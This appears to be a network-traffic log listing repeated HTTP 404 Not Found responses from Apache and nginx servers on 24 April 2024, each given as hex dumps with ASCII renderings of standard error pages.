Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 05:27:02 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 05:27:05 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 05:27:08 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 05:27:10 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 24 Apr 2024 05:27:16 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 24 Apr 2024 05:27:20 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 24 Apr 2024 05:27:23 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 24 Apr 2024 05:27:26 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 05:28:03 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i\|rO\|<0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 05:28:06 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i\|rO\|<0
